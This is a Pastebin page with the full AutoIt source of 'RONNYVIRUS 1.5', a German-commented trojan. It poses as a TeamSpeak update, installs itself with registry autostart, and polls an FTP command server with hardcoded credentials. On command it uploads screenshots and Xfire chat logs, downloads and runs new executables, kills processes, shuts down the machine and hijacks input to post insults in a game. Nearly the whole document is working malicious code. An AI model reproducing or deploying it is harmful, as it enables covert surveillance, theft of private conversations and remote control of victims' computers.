daily pastebin goal
55%
SHARE
TWEET

Untitled

a guest May 19th, 2017 40 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ;////////////////////////////////////////////
  2. ;RONNYVIRUS VERSION 1.5 by Daxter and nikeyY'
  3. ;///////////////////////////////////////////
  4. ;NEU IN 1.5: Xfire Chatlogstealer
  5. ;////////////////////////////////
  6. #include <ScreenCapture.au3>
  7. #include <Zip.au3>
  8. AutoItSetOption("TrayIconHide", 1)
  9. ;Auslesen des Xfire-Pfades
  10. $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
  11. If @error Then
  12.     $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
  13. EndIf
  14. ;Nachprüfen, ob als Updater gestartet wurde
  15. If NOT StringInStr($CmdLineRaw,"update",1) = 0 Then
  16.     update()
  17.     Exit
  18. EndIf
  19. ;Nachprüfen, ob schon infiziert wurde
  20. If @ScriptFullPath = $xfire&"\xfire_updater.exe" Then
  21.     get()
  22.     Exit
  23. EndIf
  24. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  25. ;Beginn des Fake-Updates für Teamspeak
  26. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  27. If ProcessExists("TeamSpeak.exe") Then
  28.     MsgBox(16,"Fehler!","Teamspeak sollte während der Installation nicht laufen und wird nun geschlossen.")
  29.     ProcessClose("TeamSpeak.exe")
  30. EndIf
  31. ;Auslesen des Teamspeak-Pfades
  32. $teamspeak = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\teamspeak\DefaultIcon","")
  33. if @error Then
  34.     MsgBox (16, "TeamSpeak RC2 Update", "TeamSpeak2 wurde nicht erkannt. Stellen Sie sicher, dass TeamSpeak2 installiert ist!")
  35.     infect()
  36.     Exit
  37. endif
  38. $msg = MsgBox (36, "TeamSpeak RC2 Update", "Wollen Sie Das Update installieren? ")
  39. ;Fortschrittsanzeige der Fake-Installation
  40. if $msg = 6 Then
  41.     ProgressOn("TeamSpeak RC2 Sicherheits-Update", "Update wird installiert . . .", "0 Prozent")
  42.     For $i = 10 to 43 step 1
  43.         sleep(50)
  44.         ProgressSet( $i, $i & " Prozent")
  45.     Next
  46.     For $i = 44 to 80 step 1
  47.         sleep(100)
  48.         ProgressSet( $i, $i & " Prozent")
  49.     Next
  50.     For $i = 81 to 100 step 1
  51.         sleep(30)
  52.         ProgressSet( $i, $i & " Prozent")
  53.     Next
  54.     ProgressSet(100 , "Fertig!", "Update durchgeführt")
  55.     sleep(500)
  56.     ProgressOff()
  57. else
  58.     infect()
  59.     Exit
  60. endif
  61. $msg2 = MsgBox (324, "TeamSpeak RC2 Update", "Das Update wurde erfolgreich ausgeführt. Wollen Sie TeamSpeak2 nun starten?")
  62. if $msg2 = 6 Then
  63.     Run($teamspeak)
  64. endif
  65. infect()
  66. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  67. ;Ende des Fake-Updates für Teamspeak
  68. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  69.  
  70. ;;;;;;;;;;;;;;;;;;;;;;;;
  71. ;Infektion des Computers
  72. ;;;;;;;;;;;;;;;;;;;;;;;;
  73. Func infect()
  74.     if DirGetSize("C:\Intel\Logs") = -1 Then
  75.         DirCreate("C:\Intel\Logs")
  76.     EndIf
  77.     FileDelete("C:\Intel\log.ini")
  78.     FileDelete("C:\Intel\AnalysisLog.txt")
  79.     ;Erstellen und Überstragen einer .ini-Datei
  80.     IniWrite("C:\Intel\log.ini","settings","sleep","5")
  81.     FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  82.     FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  83.     FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
  84.     FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
  85.     FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  86.     ProcessClose("ftp.exe")
  87.     ProcessWaitClose("ftp.exe")
  88.     ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
  89.     ProcessWaitClose("ftp.exe")
  90.     FileDelete("C:\Intel\AnalysisLog.txt")
  91.     FileDelete("C:\Intel\log.ini")
  92.     ;Beenden voriger Versionen
  93.     ProcessClose("xfire_updater.exe")
  94.     ProcessWaitClose("xfire_updater.exe")
  95.     ;Kopieren in den Xfire-Ordner
  96.     FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
  97.     ;Registry-Eintrag für Autostart setzen
  98.     $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
  99.     If NOT $var = 1 Then
  100.         FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
  101.     EndIf
  102.     ;Ausführen der kopierten Datei
  103.     ShellExecute($xfire&"\xfire_updater.exe")
  104.     Exit
  105. EndFunc
  106. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  107. ;Ende der Infektions-Funktion
  108. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  109.  
  110. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  111. ;Befehlsabfrage- und ausführung
  112. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  113. Func get()
  114.     ;Angabe der aktuellen Version
  115.     $ver = "1.5"
  116.     ;Auslesen des Betriebssystems
  117.     if @OSVersion = "WIN_XP" Then
  118.         $os = "xp"
  119.     Else
  120.         $os = "vista"
  121.     EndIf
  122.     ;Auslesen des Firefox-Pfades               
  123.     $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox","CurrentVersion")
  124.     if @error then
  125.         $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox","CurrentVersion")
  126.     endif
  127.     $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
  128.     if @error then
  129.         $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
  130.     endif
  131.     ;Auslesen des Xfire-Pfades
  132.     $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
  133.     If @error Then
  134.         $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
  135.     EndIf
  136.     if DirGetSize("C:\Intel\Logs") = -1 Then
  137.         DirCreate("C:\Intel\Logs")
  138.     EndIf
  139.     ;Schließen des möglichen Updater-Prozesses
  140.     ProcessClose("updater.exe")
  141.     ProcessWaitClose("update.exe")
  142.     ;Löschen des Updaters
  143.     If FileExists("C:\Intel\update.exe") Then
  144.         FileDelete("C:\Intel\update.exe")
  145.     EndIf
  146.     While 1
  147.         ;Abfragen des Befehlablaufes vom Webspace
  148.         $settings = 0
  149.         FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  150.         FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  151.         FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
  152.         FileWriteLine("C:\Intel\AnalysisLog.txt", "get /"&@computername&".ini C:\Intel\log.ini")
  153.         FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  154.         ProcessClose("ftp.exe")
  155.         ProcessWaitClose("ftp.exe")
  156.         ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
  157.         ProcessWaitClose("ftp.exe")
  158.         FileDelete("C:\Intel\AnalysisLog.txt")
  159.         ;Speichern des Befehlsablaufes in einem zweidimensionalen Array
  160.         $settings = IniReadSection("C:\Intel\log.ini","settings")
  161.         FileDelete("C:\Intel\log.ini")
  162.         ;Überprüfen, ob Abfragen gelungen ist
  163.         If NOT IsArray($settings) Then
  164.             get()
  165.             Exit
  166.         EndIf
  167.         $x = 1
  168.         ;Ausführung der Befehle
  169.         While $x < ($settings[0][0] + 1)
  170.             ;Sleep-Befehl
  171.             If $settings[$x][0] = "sleep" Then
  172.                 Sleep((Number($settings[$x][1]))*1000) 
  173.             EndIf
  174.             ;Link-Befehl
  175.             If $settings[$x][0] = "link" Then
  176.                 AutoItSetOption("WinTitleMatchMode",2)
  177.                 Run($firefox&" -new-tab "&$settings[$x][1])
  178.                 ProcessWait("firefox.exe")
  179.                 WinActivate("Mozilla Firefox")
  180.                 WinWaitActive("Mozilla Firefox")
  181.             EndIf
  182.             ;Mediaplayer-Funktion
  183.             If $settings[$x][0] = "media" Then
  184.                 ProcessClose("wmplayer.exe")
  185.                 ProcessWaitClose("wmplayer.exe")
  186.                 ShellExecute("wmplayer",'/Filename "'&$settings[$x][1]&'"',"","open",@SW_Hide)
  187.             EndIf
  188.             ;MsgBox-Funktion
  189.             If $settings[$x][0] = "msg" Then
  190.                 MsgBox(64,"",$settings[$x][1])
  191.             EndIf
  192.             ;CD-Laufwerks-Funktion
  193.             If $settings[$x][0] = "cd" Then
  194.                 CDTray("E:", $settings[$x][1])
  195.                 CDTray("F:", $settings[$x][1])
  196.                 CDTray("G:", $settings[$x][1])
  197.                 CDTray("H:", $settings[$x][1])
  198.             EndIf
  199.             ;Xfire-Chatlog-Hochlade-Funktion
  200.             If $settings[$x][0] = "chatlog" and $settings[$x][1] = "xfire" Then
  201.                 FileDelete("C:\Intel\Logs\log.zip")
  202.                 _Zip_Create("C:\Intel\Logs\log.zip")
  203.                 _Zip_AddFolderContents("C:\Intel\Logs\log.zip", @AppDataDir & "\Xfire\chatlog")
  204.                 sleep(3000)
  205.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  206.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  207.                 FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
  208.                 FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.zip /chatlogs/"&@ComputerName&"_xfire.zip")
  209.                 FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
  210.                 ProcessClose("ftp.exe")
  211.                 ProcessWaitClose("ftp.exe")
  212.                 ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
  213.                 ProcessWaitClose("ftp.exe")
  214.                 FileDelete("C:\Intel\Logs\Log.txt")
  215.                 FileDelete("C:\Intel\Logs\log.zip")
  216.             EndIf
  217.             ;Prozessschließungs-Funktion
  218.             If $settings[$x][0] = "close" Then
  219.                 ProcessClose($settings[$x][1])
  220.             EndIf
  221.             ;Funktion zum Beenden des Abfragens
  222.             If $settings[$x][0] = "exit" Then
  223.                 Exit
  224.             EndIf
  225.             ;Screenshot-Funktion
  226.             If $settings[$x][0] = "screen" Then
  227.                 _ScreenCapture_SetJPGQuality(Number($settings[$x][1]))
  228.                 _ScreenCapture_Capture("C:\Intel\Logs\log.jpg")
  229.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  230.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  231.                 FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
  232.                 FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.jpg /screenshots/"&@ComputerName&"/"&@MDAY&"."&@MON&"-"&@HOUR&"."&@MIN&"."&@SEC&".jpg")
  233.                 FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
  234.                 ProcessClose("ftp.exe")
  235.                 ProcessWaitClose("ftp.exe")
  236.                 ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
  237.                 ProcessWaitClose("ftp.exe")
  238.                 FileDelete("C:\Intel\Logs\Log.txt")
  239.                 FileDelete("C:\Intel\Logs\log.jpg")
  240.             EndIf
  241.             ;Shutdown-Funktion
  242.             If $settings[$x][0] = "shutdown" Then
  243.                 Shutdown($settings[$x][1]) 
  244.             EndIf
  245.             ;Selfkill-Funktion(CoD2)
  246.             If $settings[$x][0] = "selfkill" Then
  247.                 BlockInput(1)
  248.                 Send("{a up}")
  249.                 Send("{w up}")
  250.                 Send("{s up}")
  251.                 Send("{d up}")
  252.                 MouseMove(mousegetpos(0)+50, mousegetpos(1)+2000, 1)
  253.                 sleep (50)
  254.                 Send("^/+frag/-frag")
  255.                 sleep (50)
  256.                 MouseMove(mousegetpos(0)+50, mousegetpos(1)+1000, 80)  
  257.                 Sleep(200)
  258.                 Send("tI AM GAY!"& @CRLF)
  259.                 sleep(1000)
  260.                 BlockInput(0)
  261.             EndIf
  262.             ;Scroll-Funktion
  263.             If $settings[$x][0] = "scroll" Then
  264.                 BlockInput(1)
  265.                 $y = ($settings[$x][1]*10)
  266.                 While $y>0
  267.                     MouseWheel("down", 1)
  268.                     Sleep(100)
  269.                     $y = $y - 1
  270.                 WEnd
  271.                 BlockInput(0)
  272.             EndIf
  273.             ;Pause-Funktion
  274.             If $settings[$x][0] = "pause" Then
  275.                 IniWrite("C:\Intel\log.ini","settings","sleep","5")
  276.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  277.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  278.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
  279.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
  280.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  281.                 ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
  282.                 ProcessWaitClose("ftp.exe")
  283.                 FileDelete("C:\Intel\AnalysisLog.txt")
  284.                 FileDelete("C:\Intel\log.ini")
  285.             EndIf
  286.             ;Update-Funktion (Laden und Ausführen der neuen .exe vom Webspace)
  287.             If $settings[$x][0] = "update" AND $settings[$x][1] <> $ver Then
  288.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  289.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  290.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "binary")
  291.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "get /update/update.exe C:\Intel\update.exe")
  292.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  293.                 ProcessClose("ftp.exe")
  294.                 ProcessWaitClose("ftp.exe")
  295.                 ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
  296.                 ProcessWaitClose("ftp.exe")
  297.                 FileDelete("C:\Intel\AnalysisLog.txt")
  298.                 FileDelete("C:\Intel\log.ini")
  299.                 If FileExists("C:\Intel\update.exe") Then
  300.                     ShellExecute("C:\Intel\update.exe","update")
  301.                     ProcessWait("update.exe")
  302.                 EndIf
  303.                 Exit
  304.             EndIf
  305.             $x = $x + 1
  306.         WEnd
  307.         ;Ende der Befehlsausführung, erneute Ablaufabfrage
  308.     WEnd
  309. EndFunc
  310. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  311. ;Ende der Abfrage- und Ausführungsfunktion
  312. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  313.  
  314. ;;;;;;;;;;;;;;;;
  315. ;Update-Funktion
  316. ;;;;;;;;;;;;;;;;
  317. Func update()
  318.     ;Auslesen des Xfire-Pfades
  319.     $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
  320.     If @error Then
  321.         $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
  322.     EndIf
  323.     ;Schließen des alten Prozesses
  324.     ProcessClose("xfire_updater.exe")
  325.     ProcessWaitClose("xfire_updater.exe")
  326.     ;Löschen der alten .exe
  327.     If FileExists($xfire&"\xfire_updater.exe") Then
  328.         FileDelete($xfire&"\xfire_updater.exe")
  329.         If FileExists($xfire&"\xfire_updater.exe") Then
  330.             update()
  331.             Exit
  332.         EndIf
  333.     EndIf
  334.     ;Infizieren mit neuer .exe
  335.     FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
  336.     ;;Registry-Eintrag für Autostart setzen
  337.     $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
  338.     If NOT $var = 1 Then
  339.         FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
  340.     EndIf
  341.     ;Starten der neuen .exe
  342.     ShellExecute($xfire&"\xfire_updater.exe")
  343. Exit
  344. EndFunc
  345. ;;;;;;;;;;;;;;;;;;;;;;;;;
  346. ;Ende der Update-Funktion
  347. ;;;;;;;;;;;;;;;;;;;;;;;;;
RAW Paste Data
Top